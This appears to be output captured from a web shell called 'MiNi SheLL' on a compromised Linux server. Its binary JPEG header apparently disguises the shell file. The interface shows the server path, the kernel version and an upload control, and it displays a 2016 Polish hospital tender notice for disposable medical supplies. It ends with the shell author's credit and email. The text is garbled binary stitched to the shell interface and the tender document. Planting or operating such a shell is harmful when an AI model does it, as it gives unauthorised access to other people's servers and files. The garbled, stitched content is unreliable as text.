JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160607/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160607/73551-N-2016.html

<p class="kh_header"><b>Wrocław: DOSTAWA SPRZĘTU MEDYCZNEGO JEDNORAZOWEGO UŻYTKU - DOGRYWKA (1) USK/DZP/PN-95/2016</b><br>
<b>Numer ogłoszenia: 73551 - 2016; data zamieszczenia: 07.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytecki Szpital Kliniczny im. Jana Mikulicza-Radeckiego , ul. Borowska 213, 50-556 Wrocław, woj. dolnośląskie, tel. 71 733 11 40, faks 071 733 11 49.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.usk.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA SPRZĘTU MEDYCZNEGO JEDNORAZOWEGO UŻYTKU - DOGRYWKA (1) USK/DZP/PN-95/2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWA SPRZĘTU MEDYCZNEGO JEDNORAZOWEGO UŻYTKU - DOGRYWKA (1) - 152 ZADANIA.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 152.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.04.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wpłacić wadium dla całości zamówienia w kwocie 10 371,68 zł słownie: (dziesięć tysięcy trzysta siedemdziesiąt jeden zł 68/100) oraz w rozbiciu na poszczególne zadania:
1.	Pakiet nr 1a pozycja 1	28,00
2.	Pakiet nr 1a pozycja 2	7,00
3.	Pakiet nr 2B pozycja 2	1,00
4.	Pakiet nr 2B pozycja 4	115,00
5.	Pakiet nr 3 a pozycja 7	3,00
6.	Pakiet nr 3 a pozycja 8	16,00
7.	Pakiet nr 3 a pozycja 13	8,00
8.	Pakiet nr 3 a pozycja 14	4,00
9.	Pakiet nr 3 a pozycja 16	54,00
10.	Pakiet nr 3 a pozycja 18	1,00
11.	Pakiet nr 4 pozycja 11	2,00
12.	Pakiet nr 4 pozycja 13	2,00
13.	Pakiet nr 5 a pozycja 3	1,00
14.	Pakiet nr 5a  pozycja 4	1,00
15.	Pakiet nr 5a  pozycja 15	71,00
16.	Pakiet nr 7a  pozycja 3	2,00
17.	Pakiet nr 7a  pozycja 5	89,00
18.	Pakiet nr 7a  pozycja 7	240,00
19.	Pakiet nr 7a  pozycja 8	28,00
20.	Pakiet 9a  pozycja 5	67,00
21.	Pakiet nr 18a pozycja 2	6,00
22.	Pakiet nr 18a pozycja 3	20,00
23.	Pakiet nr 18a pozycja 4	13,00
24.	Pakiet nr 18a pozycja 5	2,00
25.	Pakiet nr 18a pozycja 6	1,00
26.	Pakiet nr 18a pozycja 7	8,00
27.	Pakiet nr 19a  pozycja 5	30,00
28.	Pakiet nr 20a pozycja 6	375,00
29.	Pakiet nr 20a pozycja 7	128,00
30.	Pakiet nr 20a pozycja 8	40,00
31.	Pakiet nr 20a pozycja 10	16,00
32.	Pakiet nr 21a  pozycja 8	10,00
33.	Pakiet nr 21a  pozycja 15	6,00
34.	Pakiet nr 21a  pozycja 17	7,00
35.	Pakiet nr 21a  pozycja 18	4,00
36.	Pakiet nr 21a  pozycja 19	8,00
37.	Pakiet nr 24	77,00
38.	Pakiet nr 26a pozycja 1	9,00
39.	Pakiet nr 26a pozycja 3	15,00
40.	Pakiet nr 26a pozycja 6	5,00
41.	Pakiet nr 26a pozycja 7	65,00
42.	Pakiet nr 26a pozycja 8	10,00
43.	Pakiet nr 26a pozycja 9	25,00
44.	Pakiet nr 26a pozycja 10	31,00
45.	Pakiet nr 27	21,00
46.	Pakiet nr 28	70,00
47.	Pakiet nr 29	6,00
48.	Pakiet nr 32a pozycja 8	2,00
49.	Pakiet nr 32a pozycja 16	2,00
50.	Pakiet nr 33 	352,00
51.	Pakiet nr 36a pozycja 6	5,00
52.	Pakiet nr 36a pozycja 7	138,00
53.	Pakiet nr 37a pozycja 3	80,00
54.	Pakiet nr 39a pozycja 5	2,00
55.	Pakiet nr 39a pozycja 6	13,00
56.	Pakiet nr 39a pozycja 7	6,00
57.	Pakiet nr 39a pozycja 8	7,00
58.	Pakiet nr 40 	1 140,00
59.	Pakiet nr 40a pozycja 7	3,00
60.	Pakiet nr 40a pozycja 19	8,00
61.	Pakiet nr 40a pozycja 22	43,00
62.	Pakiet nr 40a pozycja 23	26,00
63.	Pakiet nr 40a pozycja 24	72,00
64.	Pakiet nr 40a pozycja 28	25,00
65.	Pakiet nr 40a pozycja 29	6,00
66.	Pakiet nr 40a pozycja 30	16,00
67.	Pakiet nr 40a pozycja 31	5,00
68.	Pakiet nr 40a pozycja 32	6,00
69.	Pakiet nr 42 	732,00
70.	Pakiet nr 42 a	259,00
71.	Pakiet nr 43a pozycja 1	29,00
72.	Pakiet nr 43a pozycja 5	3,00
73.	Pakiet nr 44a pozycja 7	28,00
74.	Pakiet nr 48a pozycja 6	2,00
75.	Pakiet nr 48a pozycja 7	4,00
76.	Pakiet nr 48a pozycja 8	3,00
77.	Pakiet nr 48a pozycja 9	60,00
78.	Pakiet nr 48a pozycja 10	17,00
79.	Pakiet nr 48a pozycja 11	15,00
80.	Pakiet nr 48a pozycja 12	14,00
81.	Pakiet nr 48a pozycja 13	6,00
82.	Pakiet nr 48a pozycja 14	135,00
83.	Pakiet nr 48a pozycja 16	59,00
84.	Pakiet nr 48a pozycja 23	1,00
85.	Pakiet nr 48a pozycja 25	15,00
86.	Pakiet nr 48a pozycja 26	60,00
87.	Pakiet nr 48a pozycja 27	130,00
88.	Pakiet nr 48a pozycja 28	1,00
89.	Pakiet nr 48a pozycja 33	105,00
90.	Pakiet nr 48a pozycja 34	88,00
91.	Pakiet nr 48a pozycja 36	120,00
92.	Pakiet nr 48a pozycja 37	450,00
93.	Pakiet nr 50 pozycja 1	5,00
94.	Pakiet nr 50 pozycja 2	27,00
95.	Pakiet nr 50 pozycja 3	406,00
96.	Pakiet nr 50 pozycja 4	77,00
97.	Pakiet nr 50 pozycja 5	18,00
98.	Pakiet nr 51a pozycja 4	26,00
99.	Pakiet nr 51a pozycja 5	52,00
100.	Pakiet nr 51a pozycja 6	20,00
101.	Pakiet nr 51a pozycja 7	30,00
102.	Pakiet nr 51a pozycja 13	36,00
103.	Pakiet nr 51a pozycja 15	36,00
104.	Pakiet nr 51a pozycja 16	0,18
105.	Pakiet nr 51a pozycja 17	1,00
106.	Pakiet nr 51a pozycja 19	18,00
107.	Pakiet nr 52a pozycja 4	18,00
108.	Pakiet nr 53a pozycja 3	4,00
109.	Pakiet nr 53a pozycja 5	0,50
110.	Pakiet nr 53a pozycja 7	1,00
111.	Pakiet nr 53a pozycja 8	4,00
112.	Pakiet nr 53a pozycja 9	4,00
113.	Pakiet nr 53a pozycja 13	186,00
114.	Pakiet nr 53a pozycja 15	5,00
115.	Pakiet nr 55a pozycja 10	114,00
116.	Pakiet nr 55a pozycja 16	62,00
117.	Pakiet nr 55a pozycja 17	47,00
118.	Pakiet nr 56a pozycja 1	2,00
119.	Pakiet nr 56a pozycja 2	2,00
120.	Pakiet nr 56a pozycja 3	22,00
121.	Pakiet nr 56a pozycja 4	63,00
122.	Pakiet nr 56a pozycja 9	1,00
123.	Pakiet nr 56a pozycja 20	2,00
124.	Pakiet nr 56a pozycja 26	12,00
125.	Pakiet nr 56a pozycja 27	24,00
126.	Pakiet nr 56a pozycja 34	8,00
127.	Pakiet nr 56a pozycja 35	126,00
128.	Pakiet 65 pozycja 1	98,00
129.	Pakiet 65a  pozycja 1	188,00
130.	Pakiet 65a  pozycja 2	125,00
131.	Pakiet 65a  pozycja 3	167,00
132.	Pakiet 65a  pozycja 4	24,00
133.	Pakiet 65a  pozycja 5	122,00
134.	Pakiet 65a  pozycja 6	484,00
135.	Pakiet nr 73 a podpakiet 2	12,00
136.	Pakiet nr 73 a podpakiet 4	7,00
137.	Pakiet nr 73 a podpakiet 5	330,00
138.	Pakiet nr 74 a podpakiet5	150,00
139.	Pakiet nr 74 a podpakiet8	70,00
140.	Pakiet nr 74 a podpakiet9	90,00
141.	Pakiet nr 76 a podpakiet 6	138,00
142.	Pakiet nr 77 a podpakiet 4	21,00
143.	Pakiet nr 77 a podpakiet 5	20,00
144.	Pakiet nr 77 a podpakiet 6	68,00
145.	Pakiet nr 77 a podpakiet 7	156,00
146.	Pakiet nr 78 a podpakiet 1	12,00
147.	Pakiet nr 78 a podpakiet 3	60,00
148.	Pakiet nr 78 a podpakiet 4	120,00
149.	Pakiet nr 78 a podpakiet 5	40,00
150.	Pakiet nr 78 a podpakiet 6	23,00
151.	Pakiet nr 78 a podpakiet 7	138,00
152.	Pakiet nr 78 a podpakiet 8	208,00</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.1.1	Oświadczenie z art. 22 ust. 1 uPzp - należy przedstawić w formie oryginału wg załączonego druku -  ZAŁĄCZNIK NR 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.1.1	Oświadczenie z art. 22 ust. 1 uPzp - należy przedstawić w formie oryginału wg załączonego druku -  ZAŁĄCZNIK NR 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.1.1	Oświadczenie z art. 22 ust. 1 uPzp - należy przedstawić w formie oryginału wg załączonego druku -  ZAŁĄCZNIK NR 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.1.1	Oświadczenie z art. 22 ust. 1 uPzp - należy przedstawić w formie oryginału wg załączonego druku -  ZAŁĄCZNIK NR 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.1.1	Oświadczenie z art. 22 ust. 1 uPzp - należy przedstawić w formie oryginału wg załączonego druku -  ZAŁĄCZNIK NR 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">7.1	dokładny opis oferowanego przedmiotu zamówienia, potwierdzający spełnienie parametrów wymaganych przez Zamawiającego w formie prospektów, katalogów producenta, itp. w języku polskim) - w przypadku braku powyższych dokumentów oferta zostanie odrzucona jako niezgodna z treścią specyfikacji istotnych warunków zamówienia (z zastrzeżeniem art. 26 ust.3 PZP). Jednocześnie należy w ZAŁĄCZNIKU NR 1 do SIWZ,  podać numer strony materiałów informacyjnych, na której wymagane parametry są potwierdzone oraz zaznaczyć (np. zakreślaczem) w materiałach informacyjnych, gdzie znajduje się potwierdzenie wymaganego parametru. Dokumenty należy ułożyć chronologicznie- należy przedstawić w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
7.2	zgodnie z ustawą z dnia 20.05.2010r. o wyrobach medycznych (Dz. U. Nr 107, poz. 679), Zamawiający żąda oświadczenia Wykonawcy, że będzie posiadał aktualne i ważne przez cały okres trwania umowy dopuszczenia do obrotu na każdy oferowany produkt (w postaci Deklaracji Zgodności wydanej przez producenta oraz Certyfikatu CE wydanego przez jednostkę notyfikacyjną (jeżeli dotyczy).
Na żądanie Zamawiającego, Wykonawca w trakcie realizacji umowy ma obowiązek udostępnić: Deklarację Zgodności wydaną przez producenta oraz Certyfikat CE (jeżeli dotyczy) wydany przez jednostkę notyfikacyjną w terminie 3 dni od dnia otrzymania pisemnego wezwania, pod rygorem odstąpienia od umowy należy przedstawić w formie oryginału wg załączonego druku  - ZAŁĄCZNIK NR 5 do SIWZ</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>7.1.1	Wypełniony FORMULARZ OFERTY wraz z FORMULARZEM CENOWYM - Załącznik nr 1 do SIWZ - należy przedstawić w formie oryginału zgodnie ze wzorem zamieszczonym w Rozdziale III do SIWZ.
7.1.2	Pełnomocnictwo do podpisania oferty, oświadczeń i dokumentów składających się na ofertę, o ile pełnomocnictwo to nie wynika z innych dokumentów dołączonych do oferty - należy przedstawić w formie oryginału lub kopii potwierdzonej przez notariusza.
7.1.3	Oświadczenie o podatku VAT - ZAŁĄCZNIK NR 6 - należy przedstawić w formie oryginału zgodnie ze wzorem zamieszczonym w Rozdziale IV do SIWZ.
7.1.4	W przypadku oferty składanej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty powinno zostać załączone pełnomocnictwo dla osoby uprawnionej do reprezentowania ich w postępowaniu albo do reprezentowania ich  w postępowaniu i zawarcia umowy - należy przedstawić w formie oryginału lub kopii potwierdzonej przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - TERMIN DOSTAWY - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>6.	Nadzwyczajna zmiana stosunków umowy może nastąpić jedynie w przypadkach:
	zmiany stawki podatku od towarów i usług (VAT),
	gwałtownej dekoniunktury,
	ograniczenia dostępności surowców.
	zmniejszenia  finansowania procedury medycznej przez NFZ.
Zmiana taka nastąpić może na zgodny wniosek stron i wprowadzona  zostanie aneksem stanowiącym integralną część niniejszej umowy  przetargowej.  
7.	Dopuszcza się zmianę umowy w zakresie przedmiotowym tj. zastąpienie produktu objętego umową odpowiednikiem w przypadku:
	zaprzestania wytwarzania asortymentu objętego umową,
	wygaśnięcia świadectwa rejestracji,
	przedłożenia przez wykonawcę oferty korzystniejszej dla zamawiającego.
8.  	Zmiana, o której mowa w ust. 7, będzie dopuszczalna pod warunkiem, iż   odpowiednik będzie spełniał wszystkie wymagania zamawiającego określone w specyfikacji istotnych warunków zamówienia, nie będzie miał niższych parametrów od zaoferowanego w ofercie oraz będzie  znajdował zastosowanie w tych samych wskazaniach co asortyment objęty umową i przy cenie:
	nie wyższej niż cena asortymentu objętego umową,
	niższej od ceny asortymentu objętego umową. 
9.	Zmiany, o których mowa wyżej mogą dotyczyć nadto sposobu  konfekcjonowania asortymentu. 
10.	W sytuacji, kiedy w okresie trwania umowy nie zostanie zamówiony cały asortyment nią określony, a zaistnieje okoliczność uzasadniona potrzebami Zamawiającego, strony dopuszczają możliwość aneksowania niniejszej umowy na okres pozwalający wykorzystać asortyment w ilości niezbędnej dla funkcjonowania Zamawiającego związanego z jego działalnością, jednak na okres nie dłuższy niż do czasu rozstrzygnięcia nowej procedury przetargowej dotyczącej tożsamego asortymentu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.usk.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.usk.wroc.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2016 godzina 12:00, miejsce: w Dziale Zamówień Publicznych Uniwersyteckiego Szpitala Klinicznego, ul. Borowska 213, 50 - 556 Wrocław, pokój 5.04A, piętro IV, budynek H.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com